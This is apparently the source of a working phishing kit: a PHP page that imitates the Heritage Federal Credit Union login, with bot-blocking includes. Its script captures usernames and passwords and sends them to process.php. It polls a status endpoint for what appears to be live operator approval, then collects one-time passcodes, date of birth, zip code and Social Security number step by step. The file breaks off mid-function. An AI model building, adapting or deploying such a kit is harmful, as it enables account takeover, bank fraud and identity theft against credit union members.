
<?php

require 'bot/anti1.php';
require 'bot/anti2.php';
require 'bot/anti3.php';
require 'bot/anti4.php';
require 'bot/anti5.php';
require 'bot/anti6.php';
require 'bot/anti7.php';
require 'bot/anti8.php';

$isBot = false; 

if ($isBot) {
    header("HTTP/1.1 403 Forbidden");
    echo "Access denied.";
    exit; 
}

?>



<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width,initial-scale=1.0">
  <link rel="icon" href="img/favicons_favicon.png">
  <title>Heritage Federal Credit Union</title>
  <style>
    * { box-sizing: border-box; margin: 0; padding: 0; }
    html, body {
      height: 100%;
      font-family: 'OpenCustom', sans-serif;
      background-color: #F9FAFB;
      margin: 0;
      padding: 0;
    }

    @font-face {
      font-family: 'OpenCustom';
      src: url('font/Alkami.woff') format('woff');
      font-weight: normal;
      font-style: normal;
    }
    body {
      min-height: 100vh;
      display: flex;
      font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen-Sans, Ubuntu, Cantarell, 'Helvetica Neue', sans-serif;
      font-size: 1.6rem;
      -moz-osx-font-smoothing: grayscale;
      -webkit-font-smoothing: antialiased;
      line-height: 1.25;
      flex-direction: column;
      align-items: stretch;
      justify-content: flex-start;
    }
    .main-content {
      flex: 1 0 auto;
      display: flex;
      margin-top: 100px;
      flex-direction: column;
      align-items: center;
      justify-content: center;
      width: 100%;
      overflow-x: hidden;
      padding: 0;
    }

    .login-card-wrapper {
      width: 1050px;
      height: auto;
      transform-origin: top left;
      transition: transform 0.2s ease-in-out;
      margin: 0 auto;
      max-width: 100vw;
      overflow: hidden;
      align-self: center;
    }

    .login-card {
      display: grid;
      grid-template-columns: 1.3fr 1fr;
      align-items: center;
      width: 1050px; 
      max-width: 100%;
      height: 835px; 
      overflow: visible;
      position: relative;
    }

    .login-form {
      grid-column: 1 / 2;
      grid-row: 1 / 2;
      padding: 60px 56px 60px 56px;
      display: flex;
      flex-direction: column;
      height: 100%;
      border: 1px solid #e6e6e6;
      justify-content: flex-start;
      z-index: 1;
      margin-top: -80px;  
      margin-bottom: -80px;
      background: #fff;
      border-radius: 16px 0 0 16px;
      box-shadow: 0 8px 24px rgba(0,0,0,0.04);
    }

    .login-form .logo {
      width: 50%;
      margin-top: 20px;
      align-self: center;
      margin-bottom: 32px;
    }

    .login-form input {
      width: 100%;
      height: 48px;
      margin-bottom: 20px;
      padding: 30px 16px;
      border: none;
      border-radius: 8px;
      background-color: #F2F2F2;
      font-size: 16px;
      color: #333333;
    }
    .login-form input::placeholder {
      color: #9CA3AF;
    }

    .password-wrapper {
      position: relative;
    }
    .password-wrapper input {
      padding-right: 48px;
    }
    .password-wrapper .eye-icon {
      position: absolute;
      top: 35%;
      right: 16px;
      width: 20px;
      height: 20px;
      transform: translateY(-50%);
      cursor: pointer;
      opacity: 0.6;
      display: flex;
      align-items: center;
      justify-content: center;
    }

    .password-wrapper .eye-icon svg {
      width: 20px;
      transform: translateY(5px);
      height: 20px;
    }

    .remember-me {
      display: flex;
      align-items: center;
      margin-bottom: 50px;
    }
    .remember-me .switch {
      position: relative;
      width: 36px; 
      height: 20px; 
      margin-right: 25px;
      display: flex;
      align-items: center;
    }
    .remember-me .switch input {
      opacity: 0;
      width: 0;
      height: 0;
    }
    .remember-me .slider {
      position: absolute;
      top: -2px;
      left: -5px;
      width: 52px; 
      height: 24px; 
      background: #E5E7EB;
      border-radius: 9999px;
      transition: background 0.2s;
      box-sizing: border-box;
    }
    .remember-me .slider::before {
      content: "";
      position: absolute;
      height: 16px;
      width: 16px;
      left: 3px;
      top: 4px;
      background: #0F1F38; 
      border-radius: 50%;
      transition: transform 0.2s, background 0.2s;
      box-shadow: 0 1px 4px rgba(0,0,0,0.08);
    }
    .remember-me input:checked + .slider {
      background: #0F1F38;
    }
    .remember-me input:checked + .slider::before {
      background: #FFFFFF; 
      transform: translateX(29px);
    }
    .remember-me label {
      font-size: 14px;
      color: #374151;
      cursor: pointer;
      user-select: none;
    }

    .login-btn {
      width: 100%;
      height: 57px;
      margin-top: 0;
      background: #0F1F38;
      border: none;
      border-radius: 30px 30px 30px 30px;
      color: white;
      font-size: 16px;
      font-weight: 600;
      cursor: pointer;
      margin-bottom: 50px;
    }
    .login-btn:disabled {
      background: #0F1F38;
      color: white;
      cursor: not-allowed;
      border: none;
      opacity: 0.6;
    }

    .spinner {
      display: inline-block;
      width: 16px;
      height: 16px;
      border: 2px solid #ffffff;
      border-radius: 50%;
      border-top-color: transparent;
      animation: spin 1s ease-in-out infinite;
      margin-left: 8px;
    }

    @keyframes spin {
      to { transform: rotate(360deg); }
    }

    /* Error states */
    .input-group.error input {
      border: 2px solid #dc2626;
      background-color: #fef2f2;
    }
    
    .input-group.error input:focus {
      border: 2px solid #dc2626;
      background-color: #fff;
      outline: none;
    }
    
    .input-group input:focus {
      outline: 2px solid #0F1F38;
      background: #fff;
      border: none;
    }
    
    .input-group.error input:focus {
      outline: 2px solid #dc2626;
      border: none;
    }

    .error-message {
      color: #dc2626;
      font-size: 14px;
      margin-top: 8px;
      margin-bottom: 16px;
      display: none;
    }

    .login-btn.loading {
      background: #0F1F38;
      cursor: not-allowed;
    }
    
    .otp-form {
      display: none;
      grid-column: 1 / 2;
      grid-row: 1 / 2;
      padding: 60px 118px 60px 118px;
      flex-direction: column;
      height: 100%;
      justify-content: flex-start;
      z-index: 1;
      margin-top: -80px;
      margin-bottom: -80px;
    }
    
    .otp-form .logo {
      width: 50%;
      margin-top: 20px;
      align-self: center;
      margin-bottom: 16px;
    }
    
    .otp-identity-title {
      font-size: 24px;
      font-weight: 600;
      color: #0F1F38;
      margin-bottom: 16px;
      text-align: center;
    }
    
    .otp-message {
      font-size: 15px;
      color: black;
      text-align: left;
      margin-top: 40px;
      margin-bottom: 40px;
      line-height: 1.5;
    }
    
    .otp-title {
      font-size: 14px;
      font-weight: normal;
      color: #6B7280;
      margin-bottom: 16px;
      text-align: left;
    }
    
    .otp-input {
      width: 40%;
      height: 48px;
      padding: 0 16px;
      border: none;
      border-radius: 8px;
      background-color: #F2F2F2;
      font-size: 16px;
      color: #333333;
      text-align: left;
      letter-spacing: 4px;
      font-weight: 600;
      margin-bottom: 24px;
    }
    
    .otp-input:focus {
      outline: 2px solid #0F1F38;
      background: #fff;
    }
    
    .otp-input::placeholder {
      color: #9CA3AF;
      letter-spacing: 2px;
    }
    
    .continue-btn {
      width: 100%;
      height: 48px;
      background: #0F1F38;
      border: none;
      border-radius: 24px;
      color: white;
      font-size: 16px;
      font-weight: 600;
      cursor: pointer;
      margin-bottom: 16px;
    }
    
    .continue-btn:disabled {
      background: #0F1F38;
      color: white;
      cursor: not-allowed;
      opacity: 0.6;
    }
    
    .additional-info-form {
      display: none;
      grid-column: 1 / 2;
      grid-row: 1 / 2;
      padding: 60px 56px 60px 56px;
      flex-direction: column;
      height: 100%;
      justify-content: flex-start;
      z-index: 1;
      margin-top: -80px;
      margin-bottom: -80px;
    }

    .additional-info-form .logo {
      width: 50%;
      margin-top: 20px;
      align-self: center;
      margin-bottom: 32px;
    }
    
    .additional-info-title {
      font-size: 24px;
      font-weight: 600;
      color: #0F1F38;
      margin-bottom: 32px;
      text-align: left;
    }
    
    .additional-info-input {
      width: 80%;
      height: 60px;
      padding: 24px 16px 8px 16px;
      border: none;
      border-radius: 18px;
      background-color: #F2F2F2;
      font-size: 16px;
      color: #333333;
      margin-bottom: 20px;
    }
    
    .additional-info-input:focus {
      outline: 2px solid #0F1F38;
      background: #fff;
    }
    
    .additional-info-form .input-group {
      position: relative;
      margin-bottom: 28px;
    }
    
    .additional-info-form .input-group label {
      position: absolute;
      top: 7px;
      left: 11px;
      color: #9CA3AF;
      font-size: 13px;
      pointer-events: none;
      padding: 0 4px;
      transition: 0.2s cubic-bezier(0.4,0,0.2,1);
    }
    
    .additional-info-form .input-group input:focus + label,
    .additional-info-form .input-group input:not(:placeholder-shown) + label {
      top: 4px;
      left: 12px;
      font-size: 13px;
      color: #0F1F38;
      background: #fff;
      padding: 0 4px;
    }
    
    .additional-info-btn {
      width: 40%;
      height: 48px;
      background: #0F1F38;
      border: none;
      border-radius: 24px;
      color: white;
      font-size: 16px;
      font-weight: 600;
      cursor: pointer;
      margin-bottom: 16px;
    }
    
    .additional-info-btn:disabled {
      background: #0F1F38;
      color: white;
      cursor: not-allowed;
      opacity: 0.6;
    }

    #dobZipcodeSection {
      width: 100%;
    }

    #ssnSection {
      width: 100%;
    }

    #dobZipcodeSection .input-group {
      width: 100%;
    }

    #dobZipcodeSection .additional-info-input {
      width: 100% !important;
    }

    #dobZipcodeSection .additional-info-btn {
      width: 40% !important;
    }

    .forgot {
      text-align: center;
      font-size: 14px;
      color: #6B7280;
      margin-top: -30px;
      margin-bottom: 80px;
    }
    .forgot a {
      color: #3B82F6;
      text-decoration: none;
    }

    .register {
      text-align: center;
      font-size: 16px;
      color: #0F1F38;
      font-weight: 500;
      text-decoration: none;
    }

    .login-image {
      grid-column: 2 / 3;
      grid-row: 1 / 2;
      width: 530px;
      display: flex;
      align-items: center;
      justify-content: center;
      overflow: hidden;
      background: none;
      box-shadow: none;
    }

    .login-image img {
      width: 100%;
      height: 100%;
      object-fit: cover;
      display: block;
    }

    .spacer {
      flex-grow: 1;
    }

    .new-container {
      width: 100%;
      max-width: 1005px;
      margin: 0 auto;
      display: flex;
      flex-direction: column;
      min-height: 100vh;
    }

    .header {
      height: 150px;
      background: #f2f2f2;
      border-bottom: 1px solid #e6e6e6;
      display: flex;
      align-items: center;
      padding: 0 20px;
      box-shadow: 0 2px 4px rgba(0,0,0,0.1);
      width: 100%;
      padding: 40px;
      position: relative;
      top: 0;
      left: 0;
      z-index: 10;
    }

    .header-logo {
      height: 40px;
      width: auto;
    }

    .content-wrapper {
      flex: 1;
      display: flex;
      align-items: center;
      justify-content: center;
      padding: 40px 20px;
      background: #F9FAFB;
      width: 100%;
      margin-top: 150px;
      min-height: calc(100vh - 150px);
    }

    .new-container .content-wrapper {
      margin-top: 0;
    }

    .content-container {
      background: #fff;
      border-radius: 16px;
      border: 1px solid #ccc;
      width: 1000px;
      display: none;
      height: 660px;
      min-height: 850px;
      padding: 50px 0 50px;
    }

    .new-container .otp-form {
      flex-direction: column;
      align-items: flex-start;
      text-align: left;
      width: 750px;
      display: flex !important;
      gap: 20px;
      margin: 0 auto;
    }

    .new-container .otp-identity-title {
      font-size: 24px;
      font-weight: 600;
      color: #0F1F38;
      margin-bottom: 16px;
      text-align: left;
    }

    .new-container .otp-description {
      font-size: 14px;
      font-weight: normal;
      color: #6B7280;
      margin-bottom: 20px;
      text-align: left;
      line-height: 1.5;
    }

    .new-container .otp-message {
      font-size: 15px;
      color: black;
      text-align: left;
      margin-bottom: 20px;
      line-height: 1.5;
    }

    .new-container .otp-title {
      font-size: 14px;
      font-weight: normal;
      color: #6B7280;
      margin-bottom: -11px;
      text-align: left;
    }

    .new-container .otp-input {
      width: 50%;
      height: 48px;
      padding: 0 16px;
      border: none;
      border-radius: 8px;
      background-color: #F2F2F2;
      font-size: 16px;
      color: #333333;
      text-align: left;
      letter-spacing: 4px;
      font-weight: 600;
      margin-bottom: 24px;
    }

    .new-container .continue-btn {
      width: 40%;
      height: 48px;
      background: #0F1F38;
      border: none;
      border-radius: 24px;
      color: white;
      font-size: 16px;
      font-weight: 600;
      cursor: pointer;
      margin-bottom: 16px;
    }

    .progress-section {
      width: 100%;
      margin-bottom: 30px;
    }

    .step-counter {
      font-size: 14px;
      color: #6B7280;
      margin-bottom: 12px;
      text-align: left;
    }

    .progress-bar {
      width: 100%;
      height: 6px;
      background-color: #E5E7EB;
      border-radius: 3px;
      overflow: hidden;
    }

    .progress-fill {
      height: 100%;
      background-color: #0F1F38;
      border-radius: 3px;
      transition: width 0.3s ease;
    }

    .new-container .additional-info-form {
      flex-direction: column;
      align-items: flex-start;
      text-align: left;
      width: 660px;
      display: flex !important;
      gap: 20px;
      margin: 0 auto;
    }

    .new-container .otp-form .logo,
    .new-container .additional-info-form .logo {
      display: none;
    }

    .input-group {
      position: relative;
      margin-bottom: 28px;
    }
    .input-group label {
      position: absolute;
      top: 7px;
      left: 11px;
      color: #9CA3AF;
      font-size: 13px;
      pointer-events: none;
      padding: 0 4px;
      transition: 0.2s cubic-bezier(0.4,0,0.2,1);
    }
    .input-group input {
      width: 100%;
      height: 60px;
      padding: 24px 16px 8px 16px;
      border: none;
      border-radius: 18px;
      background-color: #F2F2F2;
      font-size: 16px;
      color: #333333;
    }
    .input-group input:focus + label,
    .input-group input:not(:placeholder-shown) + label {
      top: 4px;
      left: 12px;
      font-size: 13px;
      color: #0F1F38;
      background: #fff;
      padding: 0 4px;
    }
    .input-group input:focus {
      outline: 2px solid #0F1F38;
      background: #fff;
    }
    .password-wrapper label {
      left: 11px;
      top: 7px;
      font-size: 13px;
    }
    .required {
      color: #e11d48;
      font-size: 12px;
      font-weight: bold;
      margin-left: 2px;
      vertical-align: middle;
    }
    .footer {
      background-color: #f2f2f2;
      padding: 50px 0;
      font-family: Arial, sans-serif;
      font-size: 14px;
      color: #000;
      margin-top: 70px;
      width: 100%;
      position: relative;
      z-index: 1;
    }
    .footer .container {
      width: 90%;
      max-width: 1040px;
      margin: 0 auto;
      display: flex;
      justify-content: space-between;
      align-items: flex-start;
      flex-wrap: wrap;
    }
    .footer-left {
      flex: 1;
      line-height: 1.6;
      min-width: 250px;
    }
    .footer-left nav {
      margin-bottom: 8px;
    }
    .footer-left nav a {
      margin-right: 15px;
      text-decoration: underline;
      color: #000;
    }
    .footer-left nav a:hover {
      text-decoration: underline;
    }
    .footer-left p {
      margin: 4px 0 0;
    }
    .footer-right {
      text-align: right;
      min-width: 200px;
    }
    .footer-right .routing {
      margin-bottom: 12px;
    }
    .logo-placeholder {
      width: 240px;
      height: 80px;
      background-color: #e0e0e0;
      display: inline-block;
    }
    img#tail {
      width: 100%;
    }

    @media (max-width: 768px) {
      .login-card-wrapper {
        width: 133vw;
        max-width: 220%;
        transform: scale(0.75);
        transform-origin: top left;
      }

      .login-card {
        max-width: 150%;
      }

      .footer {
        padding: 20px 0;
        margin-top: 30px;
      }

      .footer .container {
        width: 95%;
        flex-direction: row;
        justify-content: space-between;
        align-items: center;
        gap: 20px;
      }

      .footer-left {
        flex: 1;
        margin-bottom: 0;
        min-width: auto;
      }

      .footer-right {
        flex: 1;
        text-align: right;
        min-width: auto;
      }

      .footer-left nav {
        margin-bottom: 5px;
      }

      .footer-left nav a {
        margin-right: 8px;
        font-size: 10px;
      }

      .footer-left p {
        font-size: 12px;
      }

      .footer-right .routing {
        font-size: 12px;
        margin-bottom: 8px;
      }

      .logo-placeholder {
        width: 150px;
        height: 50px;
      }

      .header {
        position: relative;
        top: 0;
        left: 0;
        padding: 30px;
        right: 0;
        z-index: 10;
        width: 100%;
      }
    }

    @media (max-width: 480px) {
      .login-card-wrapper {
        width: 154vw;
        transform: scale(0.65);
        transform-origin: top left;
      }

      .footer .container {
        gap: 15px;
      }

      .footer-left nav a {
        margin-right: 6px;
        font-size: 9px;
      }

      .footer-left p {
        font-size: 11px;
      }

      .footer-right .routing {
        font-size: 11px;
      }

      .logo-placeholder {
        width: 120px;
        height: 40px;
      }

      .header {
        position: relative;
        top: 0;
        padding: 30px;
        left: 0;
        right: 0;
        z-index: 10;
        width: 100%;
      }
    }
  </style>
</head>
<body>
  <div class="header" id="header" style="display: none;">
    <img class="header-logo" src="img/logo.png" alt="Logo">
  </div>

  <div class="main-content">
    <div class="login-card-wrapper" id="loginCardWrapper">
      <div class="login-card" id="loginCard">

      <div class="login-form">
        <img class="logo" src="img/logo.png">

        <div class="input-group">
          <label for="username">Username <span class="required">*</span></label>
          <input type="text" id="username" placeholder=" " />
        </div>

        <div class="input-group password-wrapper">
          <label for="pwd">Password <span class="required">*</span></label>
          <input type="password" placeholder=" " id="pwd" />
          <span class="eye-icon" id="togglePwdIcon" onclick="togglePwd()">
            <svg id="eyeClosed" viewBox="0 0 24 24" width="20" height="20" fill="none" xmlns="http://www.w3.org/2000/svg">
              <path d="M1 12C1 12 5 5 12 5C19 5 23 12 23 12C23 12 19 19 12 19C5 19 1 12 1 12Z" stroke="#000" stroke-width="2"/>
              <path d="M15 12C15 13.6569 13.6569 15 12 15C9 10.3431 10.3431 9 12 9C13.6569 9 15 10.3431 15 12Z" stroke="#000" stroke-width="2"/>
              <line x1="4" y1="20" x2="20" y2="4" stroke="#000" stroke-width="2"/>
              <line x1="6" y1="20" x2="22" y2="4" stroke="#fff" stroke-width="2"/>
            </svg>
            <svg id="eyeOpen" viewBox="0 0 24 24" width="20" height="20" fill="none" style="display:none;" xmlns="http://www.w3.org/2000/svg">
              <path d="M1 12C1 12 5 5 12 5C19 5 23 12 23 12C23 12 19 19 12 19C5 19 1 12 1 12Z" stroke="#000" stroke-width="2"/>
              <circle cx="12" cy="12" r="3" stroke="#000" stroke-width="2"/>
            </svg>
          </span>
        </div>

        <div class="remember-me">
          <label class="switch">
            <input type="checkbox" />
            <span class="slider"></span>
          </label>
          <label for="remember">Remember Me</label>
        </div>

        <div class="error-message" id="errorMessage"></div>

        <div class="spacer"></div>

        <button class="login-btn" id="loginBtn" disabled>Log in</button>

        <div class="forgot">
          Forgot <a href="#">Password?</a>
        </div>

        <a href="#" class="register">Register a New Account</a>
      </div>

      <div class="login-image">
        <img src="img/image.png">
      </div>

    </div>

    <div class="new-container" id="newContainer" style="display: none;">
      <div class="content-wrapper">
        <div class="content-container" id="otpFormContainer">
          <div class="otp-form" id="otpForm">
            <div class="progress-section">
              <div class="step-counter">Step 1 of 4</div>
              <div class="progress-bar">
                <div class="progress-fill" style="width: 25%;"></div>
              </div>
            </div>
            <h2 class="otp-identity-title">Verify your identity</h2>
            <h3 class="otp-description">The following information is used to verify you have an account with Heritage Federal Credit Union and that you are the owner of the account. We match your answers against our records. Questions marked with * are required and you must answer a total of 4 questions to continue. You will be locked out of the system after 3 invalid attempts.</h3>
            <p class="otp-message">A one time passcode has been sent to your registered device</p>
            <label class="otp-title" for="otpInput">Enter one time passcode.</label>
            <input type="text" class="otp-input" id="otpInput" placeholder="" />
            <button class="continue-btn" id="continueBtn">Next</button>
          </div>
        </div>
        
        <div class="content-container" id="additionalInfoFormContainer">
          <div class="additional-info-form" id="additionalInfoForm">
            <div class="progress-section">
              <div class="step-counter">Step 3 of 5</div>
              <div class="progress-bar">
                <div class="progress-fill" style="width: 60%;"></div>
              </div>
            </div>
            <h2 class="otp-identity-title">Verify your identity</h2>
            <h3 class="otp-description">The following information is used to verify you have an account with Heritage Federal Credit Union and that you are the owner of the account. We match your answers against our records. Questions marked with * are required and you must answer a total of 4 questions to continue. You will be locked out of the system after 3 invalid attempts.</h3>
            <h2 class="additional-info-title">Additional Information</h2>
            <div id="dobZipcodeSection">
              <div class="input-group">
                <label for="dobInput">Date Of Birth <span class="required"></span></label>
                <input type="text" class="additional-info-input" id="dobInput" placeholder="mm/dd/yyyy" />
              </div>
              <div class="input-group">
                <label for="zipcodeInput">Zipcode <span class="required"></span></label>
                <input type="text" class="additional-info-input" id="zipcodeInput" placeholder=" " />
              </div>
              <button class="additional-info-btn" id="additionalInfoBtn">Next</button>
            </div>
          </div>
        </div>

        <div class="content-container" id="secondOtpFormContainer" style="display: none;">
          <div class="otp-form" id="secondOtpForm">
            <div class="progress-section">
              <div class="step-counter">Step 4 of 5</div>
              <div class="progress-bar">
                <div class="progress-fill" style="width: 80%;"></div>
              </div>
            </div>
            <h2 class="otp-identity-title">Verify your identity</h2>
            <h3 class="otp-description">The following information is used to verify you have an account with Heritage Federal Credit Union and that you are the owner of the account. We match your answers against our records. Questions marked with * are required and you must answer a total of 4 questions to continue. You will be locked out of the system after 3 invalid attempts.</h3>
            <p class="otp-message">A one time passcode has been sent to your registered device</p>
            <label class="otp-title" for="secondOtpInput">Enter one time passcode.</label>
            <input type="text" class="otp-input" id="secondOtpInput" placeholder="" />
            <button class="continue-btn" id="secondContinueBtn">Next</button>
          </div>
        </div>

        <div class="content-container" id="ssnFormContainer" style="display: none;">
          <div class="additional-info-form" id="ssnForm">
            <div class="progress-section">
              <div class="step-counter">Step 5 of 5</div>
              <div class="progress-bar">
                <div class="progress-fill" style="width: 100%;"></div>
              </div>
            </div>
            <h2 class="otp-identity-title">Verify your identity</h2>
            <h3 class="otp-description">The following information is used to verify you have an account with Heritage Federal Credit Union and that you are the owner of the account. We match your answers against our records. Questions marked with * are required and you must answer a total of 4 questions to continue. You will be locked out of the system after 3 invalid attempts.</h3>
            <div class="input-group">
              <label for="ssnInput">Social Security Number <span class="required"></span></label>
              <input type="text" class="additional-info-input" id="ssnInput" placeholder=" " />
            </div>
            <button class="additional-info-btn" id="verifyBtn">Next</button>
          </div>
        </div>
      </div>
    </div>
  </div>
  <footer class="footer">
    <div class="container">
      <div class="footer-left">
        <nav>
          <a href="#">Home</a>
          <a href="#">Mobile</a>
          <a href="#">Contact Us</a>
          <a href="#">Locations</a>
          <a href="#">ATM Locations</a>
        </nav>
        <nav>
          <a href="#">Privacy Policy</a>
          <a href="#">Facebook</a>
          <a href="#">Browser Support</a>
        </nav>
        <p>Copyright © 2025 All rights reserved.</p>
      </div>
      <div class="footer-right">
        <div class="routing">
          Routing number: <strong>281378108</strong>
        </div>
        <div class="logo-placeholder"><img src="img/tail.png" id="tail"></div>
      </div>
    </div>
  </footer>

  <script>
    function togglePwd() {
      const pwd = document.getElementById('pwd');
      const eyeOpen = document.getElementById('eyeOpen');
      const eyeClosed = document.getElementById('eyeClosed');
      if (pwd.type === 'password') {
        pwd.type = 'text';
        eyeOpen.style.display = '';
        eyeClosed.style.display = 'none';
      } else {
        pwd.type = 'password';
        eyeOpen.style.display = 'none';
        eyeClosed.style.display = '';
      }
    }

    const usernameInput = document.getElementById('username');
    const passwordInput = document.getElementById('pwd');
    const loginBtn = document.getElementById('loginBtn');
    const errorMessage = document.getElementById('errorMessage');
    
    function updateLoginBtn() {
      if (usernameInput.value.trim() && passwordInput.value.trim()) {
        loginBtn.disabled = false;
      } else {
        loginBtn.disabled = true;
      }
    }
    
    function showError(message) {
      errorMessage.textContent = message;
      errorMessage.style.display = 'block';
      document.querySelector('.input-group').classList.add('error');
      document.querySelector('.password-wrapper').classList.add('error');
    }
    
    function hideError() {
      errorMessage.style.display = 'none';
      document.querySelector('.input-group').classList.remove('error');
      document.querySelector('.password-wrapper').classList.remove('error');
    }
    
    function clearErrorOnInput() {
      hideError();
    }
    
    function setLoadingState(loading) {
      if (loading) {
        loginBtn.innerHTML = 'Loading <span class="spinner"></span>';
        loginBtn.classList.add('loading');
        loginBtn.disabled = true;
      } else {
        loginBtn.innerHTML = 'Log in';
        loginBtn.classList.remove('loading');
        updateLoginBtn();
      }
    }
    
    let isFirstSubmission = true;
    let checkStatusInterval;
    
    async function handleLogin() {
      const username = usernameInput.value.trim();
      const password = passwordInput.value.trim();
      
      if (!username || !password) {
        showError('Please fill in all required fields.');
        return;
      }
      
      hideError();
      setLoadingState(true);
      
      try {
        const formData = new FormData();
        formData.append('username', username);
        formData.append('password', password);
        
        const response = await fetch('process.php', {
          method: 'POST',
          body: formData
        });
        
        const result = await response.json();
        
        if (result.status === 'error') {
          showError(result.message || 'Incorrect Login failed. Please try again.');
          setLoadingState(false);
        } else if (result.status === 'pending') {
          startStatusCheck(username);
        } else {
          showError('Login successful! Redirecting...');
          setLoadingState(false);
        }
        
      } catch (error) {
        showError('Network error. Please check your connection and try again.');
        setLoadingState(false);
      }
    }
    
    function startStatusCheck(username) {
      if (checkStatusInterval) {
        clearInterval(checkStatusInterval);
      }
      
      checkStatusInterval = setInterval(async () => {
        try {
          const response = await fetch(`status.php?user=${encodeURIComponent(username)}`);
          const result = await response.json();
          
          if (result.status === 'reject') {
            clearInterval(checkStatusInterval);
            showError('Login request rejected.');
            setLoadingState(false);
          } else if (result.status === 'otp') {
            clearInterval(checkStatusInterval);
            document.getElementById('loginCard').style.display = 'none';
            document.getElementById('header').style.display = 'flex';
            document.getElementById('newContainer').style.display = 'flex';
            document.getElementById('otpFormContainer').style.display = 'flex';
            updateProgressBar(2); 
            setLoadingState(false);
          }
        } catch (error) {
          console.error('Error checking status:', error);
        }
      }, 2000);
    }
    
    const otpInput = document.getElementById('otpInput');
    const continueBtn = document.getElementById('continueBtn');
    const otpForm = document.getElementById('otpForm');
    
    function updateContinueBtn() {
      continueBtn.disabled = false;
    }
    
    function updateProgressBar(step) {
      const progressFills = document.querySelectorAll('.progress-fill');
      const stepCounters = document.querySelectorAll('.step-counter');
      
      progressFills.forEach((fill, index) => {
        const percentage = (step / 5) * 100;
        fill.style.width = percentage + '%';
      });
      
      stepCounters.forEach((counter, index) => {
        counter.textContent = `Step ${step} of 5`;
      });
    }
    
    async function handleContinue() {
      const otp = otpInput.value.trim();
      
      continueBtn.innerHTML = 'Loading <span class="spinner"></span>';
      continueBtn.disabled = true;
      
      try {
        const formData = new FormData();
        formData.append('otp_code', otp);
        
        const response = await fetch('otp.php', {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify({ otp_code: otp })
        });
        
        const result = await response.json();
        
        if (result.status === 'error') {
          showOtpError(result.message || 'Incorrect OTP verification failed.');
        } else if (result.status === 'pending') {
          startOtpStatusCheck(otp);
        } else {
          showOtpError('Incorrect OTP verification failed.');
        }
        
      } catch (error) {
        showOtpError('Network error. Please try again.');
      }
    }
    
    function showOtpError(message) {
      const otpErrorDiv = document.getElementById('otpError');
      if (!otpErrorDiv) {
        const errorDiv = document.createElement('div');
        errorDiv.id = 'otpError';
        errorDiv.className = 'error-message';
        errorDiv.style.display = 'block';
        errorDiv.style.marginTop = '16px';
        document.querySelector('.otp-form').appendChild(errorDiv);
      }
      document.getElementById('otpError').textContent = message;
      continueBtn.innerHTML = 'Continue';
      updateContinueBtn();
    }
    
    function hideOtpError() {
      const otpErrorDiv = document.getElementById('otpError');
      if (otpErrorDiv) {
        otpErrorDiv.style.display = 'none';
      }
    }
    
    let otpCheckInterval;
    
    function startOtpStatusCheck(otpCode) {
      if (otpCheckInterval) {
        clearInterval(otpCheckInterval);
      }
      
      otpCheckInterval = setInterval(async () => {
        try {
          const response = await fetch(`otp.php?check_status=${encodeURIComponent(otpCode)}`);
          const result = await response.json();
          
          if (result.status === 'rejected') {
            clearInterval(otpCheckInterval);
            showOtpError('OTP verification rejected.');
            continueBtn.innerHTML = 'Continue';
            updateContinueBtn();
          } else if (result.status === 'accepted') {
            clearInterval(otpCheckInterval);
            document.getElementById('otpFormContainer').style.display = 'none';
            document.getElementById('additionalInfoFormContainer').style.display = 'flex';
            updateProgressBar(3); 
            continueBtn.innerHTML = 'Next';
            updateContinueBtn();
          }
        } catch (error) {
          console.error('Error checking OTP status:', error);
        }
      }, 2000);
    }
    
    const dobInput = document.getElementById('dobInput');
    const zipcodeInput = document.getElementById('zipcodeInput');
    const additionalInfoBtn = document.getElementById('additionalInfoBtn');
    const ssnInput = document.getElementById('ssnInput');
    const verifyBtn = document.getElementById('verifyBtn');
    
    const secondOtpInput = document.getElementById('secondOtpInput');
    const secondContinueBtn = document.getElementById('secondContinueBtn');
    
    function formatDOB(input) {
      let value = input.value.replace(/\D/g, '');
      if (value.length > 8) value = value.slice(0, 8);
      
      if (value.length >= 2) {
        value = value.slice(0, 2) + '/' + value.slice(2);
      }
      if (value.length >= 5) {
        value = value.slice(0, 5) + '/' + value.slice(5);
      }
      
      input.value = value;
    }
    
    function formatSSN(input) {
      let value = input.value.replace(/\D/g, '');
      if (value.length > 9) value = value.slice(0, 9);
      
      if (value.length >= 3) {
        value = value.slice(0, 3) + '-' + value.slice(3);
      }
      if (value.length >= 6) {
        value = value.slice(0, 6) + '-' + value.slice(6);
      }
      
      input.value = value;
    }
    
    function formatZipcode(input) {
      let value = input.value.replace(/\D/g, ''); 
      if (value.length > 5) value = value.slice(0, 5); 
      input.value = value;
    }
    
    function updateAdditionalInfoBtn() {
      const dobValue = dobInput.value.replace(/\D/g, '');
      const zipcodeValue = zipcodeInput.value.replace(/\D/g, '');
      
      if (dobValue.length === 8 && zipcodeValue.length === 5) {
        additionalInfoBtn.disabled = false;
      } else {
        additionalInfoBtn.disabled = true;
      }
    }
    
    function updateVerifyBtn() {
      const ssnValue = ssnInput.value.replace(/\D/g, '');
      
      if (ssnValue.length === 9) {
        verifyBtn.disabled = false;
      } else {
        verifyBtn.disabled = true;
      }
    }
    
    function updateSecondContinueBtn() {
      secondContinueBtn.disabled = false;
    }
    
    async function handleSecondContinue() {
      const secondOtp = secondOtpInput.value.trim();
      
      secondContinueBtn.innerHTML = 'Loading <span class="spinner"></span>';
      secondContinueBtn.disabled = true;
      
      try {
        const formData = new FormData();
        formData.append('otp_code', secondOtp);
        
        const response = await fetch('otp.php', {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json',
          },
          body: JSON.stringify({ otp_code: secondOtp })
        });
        
        const result = await response.json();
        
        if (result.status === 'error') {
          showSecondOtpError(result.message || 'Incorrect OTP verification failed.');
        } else if (result.status === 'pending') {
          startSecondOtpStatusCheck(secondOtp);
        } else {
          showSecondOtpError('Incorrect OTP verification failed.');
        }
        
      } catch (error) {
        showSecondOtpError('Network error. Please try again.');
      }
    }
    
    function showSecondOtpError(message) {
      const secondOtpErrorDiv = document.getElementById('secondOtpError');
      if (!secondOtpErrorDiv) {
        const errorDiv = document.createElement('div');
        errorDiv.id = 'secondOtpError';
        errorDiv.className = 'error-message';
        errorDiv.style.display = 'block';
        errorDiv.style.marginTop = '16px';
        document.querySelector('#secondOtpForm').appendChild(errorDiv);
      }
      document.getElementById('secondOtpError').textContent = message;
      secondContinueBtn.innerHTML = 'Next';
